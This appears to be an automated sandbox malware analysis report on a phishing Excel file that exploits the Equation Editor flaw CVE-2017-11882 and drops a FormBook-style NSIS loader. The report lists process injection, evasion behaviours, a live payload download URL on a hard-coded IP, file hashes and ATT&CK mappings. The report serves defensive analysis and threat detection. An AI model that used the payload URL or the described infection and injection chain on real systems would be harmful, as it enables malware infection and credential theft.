    Source: C:\Users\Public\vbc.exeCode function: 4_2_004048024_2_00404802
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00406B2B4_2_00406B2B
    Source: C:\Users\Public\vbc.exeCode function: 4_2_730675004_2_73067500
    Source: C:\Users\Public\vbc.exeCode function: 4_2_7306BA784_2_7306BA78
    Source: C:\Users\Public\vbc.exeCode function: 4_2_7306BA874_2_7306BA87
    Source: C:\Users\Public\vbc.exeCode function: 4_2_7306754F4_2_7306754F
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004063545_2_00406354
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004048025_2_00404802
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00406B2B5_2_00406B2B
    Source: C:\Users\Public\vbc.exeCode function: String function: 00402A29 appears 51 times
    Source: C:\Users\Public\vbc.exeCode function: 4_2_7306BF13 CreateProcessW,NtQueryInformationProcess,VirtualAllocEx,CreateRemoteThread,SuspendThread,4_2_7306BF13
    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
    Source: ORDERCONFIRMATION_00001679918.xlsxVirustotal: Detection: 30%
    Source: ORDERCONFIRMATION_00001679918.xlsxReversingLabs: Detection: 28%
    Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
    Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$ORDERCONFIRMATION_00001679918.xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE2EE.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@6/16@0/1
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00402053 CoCreateInstance,MultiByteToWideChar,4_2_00402053
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,4_2_004042C1
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: wntdll.pdb source: vbc.exe, 00000004.00000003.465849366.000000000E750000.00000004.00000001.sdmp
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2956Thread sleep time: -300000s >= -30000sJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00405EC2 FindFirstFileA,FindClose,4_2_00405EC2
    Source: C:\Users\Public\vbc.exeCode function: 4_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_004054EC
    Source: C:\Users\Public\vbc.exeCode function: 4_2_00402671 FindFirstFileA,4_2_00402671
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00402671 FindFirstFileA,5_2_00402671
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00405EC2 FindFirstFileA,FindClose,5_2_00405EC2
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_004054EC
    Source: vbc.exe, 00000004.00000002.467502213.00000000004D4000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeCode function: 4_2_7306B472 mov eax, dword ptr fs:[00000030h]4_2_7306B472
    Source: C:\Users\Public\vbc.exeCode function: 4_2_7306B737 mov eax, dword ptr fs:[00000030h]4_2_7306B737
    Source: C:\Users\Public\vbc.exeCode function: 4_2_7306B776 mov eax, dword ptr fs:[00000030h]4_2_7306B776
    Source: C:\Users\Public\vbc.exeCode function: 4_2_7306B7B4 mov eax, dword ptr fs:[00000030h]4_2_7306B7B4
    Source: C:\Users\Public\vbc.exeCode function: 4_2_7306B686 mov eax, dword ptr fs:[00000030h]4_2_7306B686
    Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Injects a PE file into a foreign processesShow sources
    Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 1C0000 value starts with: 4D5AJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
    Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
    Source: vbc.exe, 00000005.00000002.673362938.0000000000900000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000005.00000002.673362938.0000000000900000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: vbc.exe, 00000005.00000002.673362938.0000000000900000.00000002.00020000.sdmpBinary or memory string: Program Manager<
    Source: C:\Users\Public\vbc.exeCode function: 4_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_0040312A

    Stealing of Sensitive Information:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY

    Remote Access Functionality:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000004.00000002.469285570.000000000277A000.00000004.00000001.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection112Masquerading111OS Credential DumpingSecurity Software Discovery111Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Information Discovery4VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    ORDERCONFIRMATION_00001679918.xlsx31%VirustotalBrowse
    ORDERCONFIRMATION_00001679918.xlsx29%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\Public\vbc.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe42%VirustotalBrowse
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe20%ReversingLabsWin32.Trojan.Nsisx
    C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll15%VirustotalBrowse
    C:\Users\user\AppData\Local\Temp\nsd99E0.tmp\hmrrcvb.dll2%ReversingLabs
    C:\Users\Public\vbc.exe42%VirustotalBrowse
    C:\Users\Public\vbc.exe20%ReversingLabsWin32.Trojan.Nsisx

    Unpacked PE Files

    SourceDetectionScannerLabelLinkDownload
    4.2.vbc.exe.2770000.4.unpack100%AviraW32/Delf.IDownload File
    4.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    5.2.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1130366Download File
    4.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    5.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
    5.0.vbc.exe.1c0000.1.unpack100%AviraW32/Delf.IDownload File
    5.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1130366Download File
    5.2.vbc.exe.1c0000.0.unpack100%AviraTR/ATRAPS.GenDownload File

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.%s.comPA0%URL Reputationsafe
    http://23.94.159.204/poc/vbc.exe11%VirustotalBrowse
    http://23.94.159.204/poc/vbc.exe100%Avira URL Cloudmalware

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://23.94.159.204/poc/vbc.exetrue
    • 11%, Virustotal, Browse
    • Avira URL Cloud: malware
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.%s.comPAvbc.exe, 00000004.00000002.467563721.0000000001CD0000.00000002.00020000.sdmpfalse
    • URL Reputation: safe
    		low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.467563721.0000000001CD0000.00000002.00020000.sdmpfalse
      		high
      http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000005.00000000.466883914.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.drfalse
        		high
        http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.466883914.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.drfalse
          		high
          http://www.day.com/dam/1.0F76D3143.emf.0.drfalse
            		high

            Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public

            IPDomainCountryFlagASNASN NameMalicious
            23.94.159.204
            		unknownUnited States
            		36352AS-COLOCROSSINGUStrue

            General Information

            Joe Sandbox Version:33.0.0 White Diamond
            Analysis ID:491746
            Start date:27.09.2021
            Start time:21:07:28
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 6m 29s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:ORDERCONFIRMATION_00001679918.xlsx
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:9
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.expl.evad.winXLSX@6/16@0/1
            EGA Information:Failed
            HDC Information:
            • Successful, ratio: 61.3% (good quality ratio 33.6%)
            • Quality average: 45%
            • Quality standard deviation: 44.5%
            HCA Information:Failed
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .xlsx
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            Show All
            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe

            Simulations

            Behavior and APIs

            TimeTypeDescription
            21:08:38API Interceptor116x Sleep call for process: EQNEDT32.EXE modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            23.94.159.204RFQ-56676EE78675.xlsxGet hashmaliciousBrowse
            • 23.94.159.204/nez/vbc.exe

            Domains

            No context

            ASN

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            AS-COLOCROSSINGUSsuppression des suspensions.xlsxGet hashmaliciousBrowse
            • 107.172.73.191
            rrVvnZMcFsGet hashmaliciousBrowse
            • 23.94.26.138
            pAu4km62R9Get hashmaliciousBrowse
            • 23.94.26.138
            kUFNxyzq7hGet hashmaliciousBrowse
            • 23.94.26.138
            RPM.xlsxGet hashmaliciousBrowse
            • 23.95.13.176
            OOLU2032650751.docGet hashmaliciousBrowse
            • 107.175.64.227
            Invoice PO.docGet hashmaliciousBrowse
            • 107.175.64.227
            MOQ-Request_0927210-006452.xlsxGet hashmaliciousBrowse
            • 107.173.219.122
            RFQ_final version.xlsxGet hashmaliciousBrowse
            • 107.173.219.122
            New Price List.xlsxGet hashmaliciousBrowse
            • 192.227.225.173
            RFQ.xlsxGet hashmaliciousBrowse
            • 23.94.159.207
            RFQ.xlsxGet hashmaliciousBrowse
            • 23.94.159.207
            X86_64Get hashmaliciousBrowse
            • 172.245.168.189
            RQcnbthZwWGet hashmaliciousBrowse
            • 172.245.168.189
            haK4nXUWd3Get hashmaliciousBrowse
            • 172.245.168.189
            YIjCULj55aGet hashmaliciousBrowse
            • 172.245.168.189
            TGlHTLiPf8Get hashmaliciousBrowse
            • 172.245.168.189
            xxUEyDmxvEGet hashmaliciousBrowse
            • 172.245.168.189
            FNrg4e1rzrGet hashmaliciousBrowse
            • 172.245.168.189
            0GmF3xh0B5Get hashmaliciousBrowse
            • 172.245.168.189

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
            Category:downloaded
            Size (bytes):288145
            Entropy (8bit):7.911369635258899
            Encrypted:false
            SSDEEP:6144:F8LxBsj6b2HwEll/tCJhrAqajbLGv+qRACwWBRNZP:/ObIwElpshg0aCzBV
            MD5:A9DCC61F31601E771050463C4D41CDB0
            SHA1:C26979F1842C9F2460FC9E0F9285266B0D175B49
            SHA-256:E018D5F9CE45E81A96459FA0C717DF76B2D765F24A9A472AD2CB8D13B523F562
            SHA-512:7C592E8F6042BEA65CBD5261B0150C761B4B724E61E983DC32C2E3BE62B48D1ACAC53986DB097FE4C79A597D928F8E17FFCB639B6FC45623229719136548E6A6
            Malicious:true
            Antivirus:
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Virustotal, Detection: 42%, Browse
            • Antivirus: ReversingLabs, Detection: 20%
            Reputation:low
            IE Cache URL:http://23.94.159.204/poc/vbc.exe
            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@.........................................................................$u.......p...............................................................................p..|............................text...f^.......`.................. ..`.rdata.......p.......d..............@..@.data....]...........x..............@....ndata...................................rsrc........p.......~..............@..@................................................................................................................................................................................................................................................................................................................................................................
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1692293F.jpeg
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 509x209, frames 3
            Category:dropped
            Size (bytes):16706
            Entropy (8bit):7.7803211045289515
            Encrypted:false
            SSDEEP:384:x3+Ep+jY0GYbjcRJAcb8B2dBWWWWWWW6XPApAJz+2Jn+BSNdb7q:lmVsYcb8BQWWWWWWWmnrJn+MNA
            MD5:9984958CFC3A96E32DD6042DD14440DB
            SHA1:ABC82F6AB5C1D7C8BA0CDF10CFDC1F1916F58630
            SHA-256:65EC42573985A8CDA90B901C23F8ECE366493301ADDB12ED0B86F4CD3A48756D
            SHA-512:32DA7ED1AEC317A162BBF75ADA4D500DE3058A7C0953D98CCEC0D26E98313C002AD90E3B551F755A37B58CC34EF2B675E930A634E00524AF2905F119A39F8022
            Malicious:false
            Reputation:low
            Preview: ......JFIF.....`.`.....C....................................................................C............................................................................".................................................................................>...0D,...!.\.UrI.YLKAV..kAU...M.o....[.+.M.-o.e...1KX.YX...1X...'.X?l.%G..$..B..Y{..k...g.))7M'.+|j..?sg..U..s.....*-.jWb.|..s1e/..Qy..63E..X+..X+..q.....,0F.IE....[.Q>.Q.$.Q).JE..D..K........Xz.Kg.....b.Q....3.~g...5}.u.l9.{..b.[.u....]b....0....$....}`.......M*KdIt..h..9 .1%.@+K%fr`).o.....sr......=...=g.p......=.OO......%.J..J..I.I....u.i.;.....x.;..ag......w.z.9^..\.:S.{...K.]|4(...j..S.i.7+......b..h{>....>....7|1..I{..i.2.OJ.J.ke.x6..sq.......-....^..|>......}.&....$ju..u..^;4..)....W^.HYw...N.._N../Q...G7...>..(.6}-\.._.S'....K...F._....7Es..94..Gg.U...`..wb....a...[...f.*...v..o#..f...i?|..=.h.. ..............T...]<wY"...........................7.{...3..`......................S.....s1..............
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C3144A5.png
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
            Category:dropped
            Size (bytes):65050
            Entropy (8bit):7.959940260382877
            Encrypted:false
            SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
            MD5:22335141D285E599CDAEF99EABA59D5B
            SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
            SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
            SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview: .PNG........IHDR....... ......]....b.zTXtRaw profile type exif..x..Y..8.].9.........L3....UFvU&.d..|q.;..f..^...........j.W..^...RO=..C.....=......N..).._......=........./...........?....Cl.>.......7...~....'..<...W..{o......q..5~..O.;U.ce>.W.Oxn...-.O......w..I........v..s&.|x....:......?..u.??P....y.....}q..'..}.?...........}.j..o...I...K......G.._+.U...?..W..+Nnlq.....z....RX.._...3L.1..9.........8.$.._.\....Ln....%.....fh|...d.|X.7........_....StC......+*.<.7...S\H...i>.{...Nn....../.....#..d.9...s.N..S.P...........Kxr(.1..8....<y|R..@.9.p}......E.....l......"?.Ui....RF~jj.....s...{~.SR..Z.Qo}j...Zk....i..VZm......LX......./..../?.#.g..G.u...;...f.e..f...Y..*.^.....6.................}.{.vk............[...........G..I.....7^...:zgw.)Eo.;.{D)r..B.rV....C._....us..]9...[..n...._...........sk.=..9...z...a......e.7.<Vm;....s.w....o./kq.y.w..:q`;..A({.}...w~<.S..WJ.).Zz.c.#`.xN...1.9..1...k.o. ..-.M|....,..i.[.\.;......8...x.
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\286302FB.jpeg
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 686x220, frames 3
            Category:dropped
            Size (bytes):104859
            Entropy (8bit):7.948547334191616
            Encrypted:false
            SSDEEP:1536:MsG61be3dUW45hIfxJRv0dWHB3C7oTstUb+wfOA3MKFlYdHTXL1LUbqBGa:23S7idv+UKuZlsb1IbqBGa
            MD5:50B23CFD2E093C27B7624BB70EF7A825
            SHA1:788949A19E6CD30ABD7BE309A513F3D21CFC3064
            SHA-256:BC395AEB9904601F13C40A70318EB5BE8C800C864E86831BE00C061874B7D495
            SHA-512:4F068FBF4AB20DD9C65CC2D67FC802F7D4BC4233460B585F3F5367519095D8CD998A1F02A90CD6642FE4D5195B9EA8A6BA6BC773F722AFEA574B3DE4E7DEA979
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview: ......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......W>....r..m(0.Q..k.<A.d~.....u.J.A..........;g.....8..mf=.2k.*....M....J....k.?...~.x....~..~..~.....s.]...G....;...j....8C.P....=..../.o.\.v...C..&...5..F.....U..n,.lmV`._.<.....r..S...z....w[C..v.....8'..ry....~%.?..-m.7.W........p.:q...D.|.+pH..a.67d.o.K......%.kga..ZE....Ea. .&_5.F.L.*8.1F@-%.{n.....F....u[.tM/..m5mm...$.&.I...$L.8..WFh.....de.
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36E70CB6.jpeg
            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 686x220, frames 3
            Category:dropped
            Size (bytes):104859
            Entropy (8bit):7.948547334191616
            Encrypted:false
            SSDEEP:1536:MsG61be3dUW45hIfxJRv0dWHB3C7oTstUb+wfOA3MKFlYdHTXL1LUbqBGa:23S7idv+UKuZlsb1IbqBGa
            MD5:50B23CFD2E093C27B7624BB70EF7A825
            SHA1:788949A19E6CD30ABD7BE309A513F3D21CFC3064
            SHA-256:BC395AEB9904601F13C40A70318EB5BE8C800C864E86831BE00C061874B7D495
            SHA-512:4F068FBF4AB20DD9C65CC2D67FC802F7D4BC4233460B585F3F5367519095D8CD998A1F02A90CD6642FE4D5195B9EA8A6BA6BC773F722AFEA574B3DE4E7DEA979
            Malicious:false
